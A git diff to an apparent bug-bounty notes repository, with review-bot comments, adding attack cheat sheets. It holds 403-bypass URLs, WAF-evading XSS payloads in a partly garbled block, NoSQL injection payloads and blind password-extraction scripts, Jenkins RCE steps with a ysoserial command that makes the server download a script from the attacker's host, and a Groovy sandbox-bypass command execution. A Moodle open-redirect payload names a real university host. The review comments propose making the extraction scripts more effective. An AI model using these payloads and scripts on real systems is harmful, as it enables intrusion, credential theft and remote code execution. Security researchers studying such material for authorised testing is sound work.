diff --git a/Bypass/Bypass 403.md b/Bypass/Bypass 403.md index fe7e9ce..ba5efef 100644 --- a/Bypass/Bypass 403.md +++ b/Bypass/Bypass 403.md @@ -1,5 +1,11 @@ # 403 Forbidden Bypass +## Tools + +* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) + + +## Exploit 1. Using "X-Original-URL" header ``` GET /admin HTTP/1.1 @@ -21,15 +27,18 @@ Try this to bypass http://target.com/%2e/admin => 200 ``` -3. Try add dot (.) and slash (/) in the URL +3. Try add dot (.) slash (/) and semicolon (;) in the URL ``` http://target.com/admin => 403 ``` Try this to bypass ``` -http://target.com/admin/. => 200 -http://target.com//admin// => 200 -http://target.com/./admin/./ => 200 +http://target.com/secret/. => 200 +http://target.com//secret// => 200 +http://target.com/./secret/.. => 200 +http://target.com/;/secret => 200 +http://target.com/.;/secret => 200 +http://target.com//;//secret => 200 ``` 4. Add "..;/" after the directory name @@ -58,4 +67,6 @@ Host: victim.com X­-Original-­URL: /admin ``` -Source: [@iam_j0ker](https://twitter.com/iam_j0ker) +Source: +- [@iam_j0ker](https://twitter.com/iam_j0ker) +- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 53016c9..1d29e70 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md 
@@ -336,5 +336,50 @@ javascript://%250Aalert(1) ``` +## Bypass WAF +1. Cloudflare +``` + + + + + + + + + +Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); + +"> + +%2sscript%2ualert()%2s/script%2u -xss popup + + + +"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm)) + +[1].map(confirm)'ale'+'rt'()a l e r t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``) + + + + + + + + +``` + Reference: - [Brute Logic](https://brutelogic.com.br/) \ No newline at end of file diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md index 75557b0..3dcedca 100644 --- a/Misc/Broken Link Hijacking.md +++ b/Misc/Broken Link Hijacking.md @@ -1,14 +1,14 @@ # Broken Link Hijacking -## **Introduction** -Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page -## **How to Find** +## Tools +- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) + +## Definition +Broken Link Hijacking exists whenever a target links to an expired domain or page + +## How to find 1. Manually find external links on the target site (For example, check some links to social media accounts) -2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command - -``` -blc -rof --filter-level 3 https://vuln.com/ -``` +2. Try using tools to find broken link, for example using tools that listed in this readme References: - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) diff --git a/Misc/Exposed API keys.md b/Misc/Exposed API keys.md new file mode 100644 index 0000000..2558fee --- /dev/null +++ b/Misc/Exposed API keys.md 
@@ -0,0 +1,10 @@ +# Exposed API Keys + +## Tools +* [Key-Checker](https://github.com/daffainfo/Key-Checker) + +## Definition +Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company. + +## How to exploit +[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys \ No newline at end of file diff --git a/NoSQL Injection.md b/NoSQL Injection.md index 0f70829..6054e7f 100644 --- a/NoSQL Injection.md +++ b/NoSQL Injection.md 
@@ -1 +1,143 @@ -# Soon! \ No newline at end of file +## NoSQL injection + +## Tools + +* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) + +## Exploit + +### Authentication Bypass + +Basic authentication bypass using not equal ($ne) or greater ($gt) + +``` +in the request +- username[$ne]=toto&password[$ne]=toto +- login[$regex]=a.*&pass[$ne]=lol +- login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto +``` + +```json +The output is +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} +{"username": {"$gt": undefined}, "password": {"$gt": undefined}} +{"username": {"$gt":""}, "password": {"$gt":""}} +``` + +### Extract length information + +```json +username[$ne]=toto&password[$regex]=.{1} +username[$ne]=toto&password[$regex]=.{3} +``` + +### Extract data information + +```json +in URL +username[$ne]=toto&password[$regex]=m.{2} +username[$ne]=toto&password[$regex]=md.{1} +username[$ne]=toto&password[$regex]=mdp + +username[$ne]=toto&password[$regex]=m.* +username[$ne]=toto&password[$regex]=md.* + +in JSON +{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} +``` + +### Extract data with "in" + +```json +{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} +``` + +### PHP Arbitrary Function Execution +```json +"user":{"$func": "var_dump"} +``` + +## Blind NoSQL + +### POST + +```python +import requests +import urllib3 +import string +import urllib +urllib3.disable_warnings() + +username="admin" +password="" +u="http://example.org/login" +headers={'content-type': 'application/json'} + +while True: + for c in string.printable: + if c not in ['*','+','.','?','|']: + payload='{"username": {"$eq": "%s"}, 
"password": {"$regex": "^%s" }}' % (username, password + c) + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + if 'OK' in r.text or r.status_code == 302: + print("Found one more char : %s" % (password+c)) + password += c +``` + +### GET + +```python +import requests +import urllib3 +import string +import urllib +urllib3.disable_warnings() + +username='admin' +password='' +u='http://example.org/login' + +while True: + for c in string.printable: + if c not in ['*','+','.','?','|', '#', '&', '$']: + payload='?username=%s&password[$regex]=^%s' % (username, password + c) + r = requests.get(u + payload) + if 'Yeah' in r.text: + print("Found one more char : %s" % (password+c)) + password += c +``` + +Another example using sleep to check vuln or not +``` +'%2bsleep(1)%2b' +``` + +### MongoDB Payloads + +```bash +true, $where: '1 == 1' +, $where: '1 == 1' +$where: '1 == 1' +', $where: '1 == 1' +1, $where: '1 == 1' +{ $ne: 1 } +', $or: [ {}, { 'a':'a +' } ], $comment:'successful MongoDB injection' +db.injection.insert({success:1}); +db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 +|| 1==1 +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +{$gt: ''} +[$ne]=1 +``` + +## References + +* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection) +* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md) \ No newline at end of file diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md new file mode 100644 index 0000000..77d11d0 --- /dev/null +++ b/OAuth Misconfiguration.md 
@@ -0,0 +1,13 @@ +# OAuth Misconfiguration +1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses). +2. Change Referral header to attacker(.)com while requesting OAuth. +3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials. +4. OAuth Token Re-use. +5. Missing or broken state parameter. +6. Lack of origin check. +7. Open Redirection on another endpoint > Use it in redirect_uri +8. If there is an email parameter after signin then try to change the email parameter to victim's one. +9. Try to remove email from the scope and add victim's email manually. +10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com +11. Check if its leaking client_secret parameter. +12. Go to the browser history and check if the token is there. \ No newline at end of file diff --git a/README.md b/README.md index 458f20b..0f845aa 100644 --- a/README.md +++ b/README.md 
@@ -1,18 +1,24 @@ # All about bug bounty These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too! +![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty) +![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty) +![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty) +![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty) + ## List - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) -- SQL Injection (SOON) -- NoSQL Injection (SOON) -- Local File Inclusion (SOON) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) -- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) -- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md) - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) +- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) +- Local File Inclusion (SOON) +- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) +- SQL Injection (SOON) +- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) +- [Open 
Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) ## List Bypass @@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ## List Framework - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md) -- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD) +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md) ## Miscellaneous - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md) @@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md) - [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) -- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md) + +## Technologies +- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) +- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) +- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) ## Reconnaissance - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) diff --git a/Technologies/Jenkins.md b/Technologies/Jenkins.md new file mode 100644 index 0000000..f52e3d0 --- /dev/null +++ b/Technologies/Jenkins.md 
@@ -0,0 +1,66 @@ +## Jenkins +1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) + +Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload. +Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py): + +```bash +java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out +./jenkins_rce.py jenkins_ip jenkins_port payload.out +``` + +2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) + +Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). + +If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable: +```bash +curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a +``` + +3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002) + +Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce). + +Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc). + +4. 
CVE-2019-1003030 + +How to Exploit: +- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html) + +``` +GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { + public x(){ +"ping -c 1 xx.xx.xx.xx".execute() +} +} HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0 +Connection: close +Upgrade-Insecure-Requests: 1 +``` +URL Encoding the following for RCE +``` +public class x { + public x(){ +"ping -c 1 xx.xx.xx.xx".execute() + } +} +``` +to + +%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d + +5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392) + +How to exploit: +- [@jas502n](https://github.com/jas502n/CVE-2019-10392) +- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html) + +Reference: +- https://github.com/gquere/pwn_jenkins \ No newline at end of file diff --git a/Misc/Unauthenticated Jira CVE.md b/Technologies/Jira.md similarity index 97% rename from Misc/Unauthenticated Jira CVE.md rename to Technologies/Jira.md index 9d9034e..291f004 100644 --- a/Misc/Unauthenticated Jira CVE.md +++ b/Technologies/Jira.md @@ -59,4 +59,7 @@ Connection: close 12. CVE-2019-3402 (XSS) ``` https:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search -``` \ No newline at end of file +``` + +Reference: +- https://twitter.com/harshbothra \ No newline at end of file 
diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md new file mode 100644 index 0000000..bb4a6d1 --- /dev/null +++ b/Technologies/Moodle.md @@ -0,0 +1,12 @@ +# Moodle + +1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter +``` +https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1) +``` + +2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter + +``` +https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com +``` \ No newline at end of file
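Review bot: In Bypass/Bypass 403.md, hunk `@@ -21,15 +27,18 @@`, the bypass lines were switched from `/admin` to `/secret` but the baseline line above them still reads `http://target.com/admin => 403`, so the example no longer compares the same path; use one path throughout. Also `http://target.com/./secret/..` replaces the original `/./admin/./`: a trailing `/..` normalizes to the parent directory (`/`), not to `/secret`, so either revert to `/./secret/./` or drop that line.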
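Review bot: In Cross Site Scripting.md, hunk `@@ -336,5 +336,50 @@`, the new `## Bypass WAF` block under `1. Cloudflare` consists mostly of empty lines, and the payloads that are present are run together on single lines (e.g. `"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>...`) with an inline annotation `-xss popup` inside the fence. Put one payload per line, move the annotation to prose outside the fence, and remove the blank lines so the block is copy-pasteable; as committed a reader cannot tell where one payload ends and the next begins.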
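Review bot: In Misc/Broken Link Hijacking.md, the hunk removes the only concrete invocation (`blc -rof --filter-level 3 https://vuln.com/`) and replaces step 2 with `Try using tools to find broken link, for example using tools that listed in this readme`. The new Tools section links the project, but the command with its flags is what a reader actually needs; keep it under step 2 or under Tools. Grammar: `tools that listed in this readme` should read `the tools listed in this readme`, and `broken link` should be plural.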
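Review bot: In Misc/Exposed API keys.md, `There is 79 list of how to check the validity of the API keys` should read `It lists 79 ways to check whether an API key is valid`, and the hard-coded count will go stale as keyhacks grows; prefer dropping the number. keyhacks is the resource the `## How to exploit` section relies on, so list it under `## Tools` next to Key-Checker. Also add a trailing newline here and in the other new files in this diff; each one ends with `\ No newline at end of file`.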
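Review bot: In NoSQL Injection.md, the two blind-extraction scripts loop `while True` with no exit condition: once the full password has been recovered no candidate character matches and the script spins forever. Track whether the inner `for` loop found a character and `break` when it did not, and send a final anchored check (`^%s$`) to confirm the end of the string. The POST script also interpolates `c` straight into a JSON string, so `"` and `\` from `string.printable` produce invalid request bodies; build the payload with `json.dumps(...)` and use `re.escape(c)` instead of the hand-written exclusion list, which misses `(`, `[`, `{`, `\`, `^` and `$`. The block labelled `The output is` does not correspond to the request lines above it (`username[$ne]=toto` parses to `{"username": {"$ne": "toto"}}`, not `null` or `undefined`, and `undefined` is not valid JSON inside a `json` fence), the `json`-tagged fences under `Extract length information` and `Extract data information` contain query strings rather than JSON, `import urllib` is unused in both scripts, and the title `## NoSQL injection` is an H2 where the other pages use `# Title`.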
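Review bot: In OAuth Misconfiguration.md, item 2 says `Change Referral header`; the HTTP header is `Referer`. Item 3 lists the two account creations but not what the tester is checking for; state the expected outcome, i.e. whether the earlier password credentials still log in to the account now linked through OAuth. Items 1 and 7 both concern `redirect_uri` manipulation and could be merged, and the page has none of the `## Tools` / `## Definition` / `## How to exploit` structure used by the other new pages in this diff.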
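Review bot: In README.md, hunk `@@ -1,18 +1,24 @@`, the list is being re-sorted alphabetically, but `- SQL Injection (SOON)` is placed before `- [OAuth Misconfiguration]` and `- [Open Redirect]`; move it after Open Redirect (before Web Cache Poisoning) so the ordering is consistent.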
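Review bot: In README.md, hunk `@@ -28,7 +34,7 @@`, the link changes from `Framework/Zend.MD` to `Framework/Zend.md`, but this diff contains no rename of `Framework/Zend.MD`. GitHub paths are case-sensitive, so unless the file is renamed in this or an accompanying commit the new link 404s; include the `git mv` in this change.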
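Review bot: In README.md, hunk `@@ -38,7 +44,11 @@`, the new `## Technologies` list is ordered Jira, Jenkins, Moodle; the main list in this same change was re-sorted alphabetically, so Jenkins should precede Jira here.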
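Review bot: In Technologies/Jenkins.md, item 1 links to `./rce/jenkins_rce_cve-2015-8103_deser.py`, a relative path this diff does not add (no `Technologies/rce/` file is created), and the command below invokes `./jenkins_rce.py`, a different filename; the text appears to be taken from the gquere/pwn_jenkins repository listed under Reference, so link the script there by absolute URL or vendor it into this repo. In item 4, the request is shown as a GET line containing literal newlines inside the `value=` parameter (not a valid request line) and carries a copy-pasted `Cookie: JSESSIONID.4495c8e0=...` and the path prefix `/jenkinselj/`; show the URL-encoded form that follows instead, drop the cookie, and fence the long percent-encoded string, which currently sits as bare text after `to`. The title `## Jenkins` is an H2 where the other pages use `# Title`.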
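Review bot: In Technologies/Moodle.md, both items name the parameter `“redirect_url”` while the URLs use `redirect_uri`; fix the prose to match the parameter actually sent. Item 2 uses a real third-party host, `https://classroom.its.ac.id/...`, as the target; replace it with the `https://target.com/` placeholder used in item 1 rather than naming a live institution in a payload list. Neither item gives an affected Moodle version or a reference, unlike the Jira and Jenkins pages in this diff.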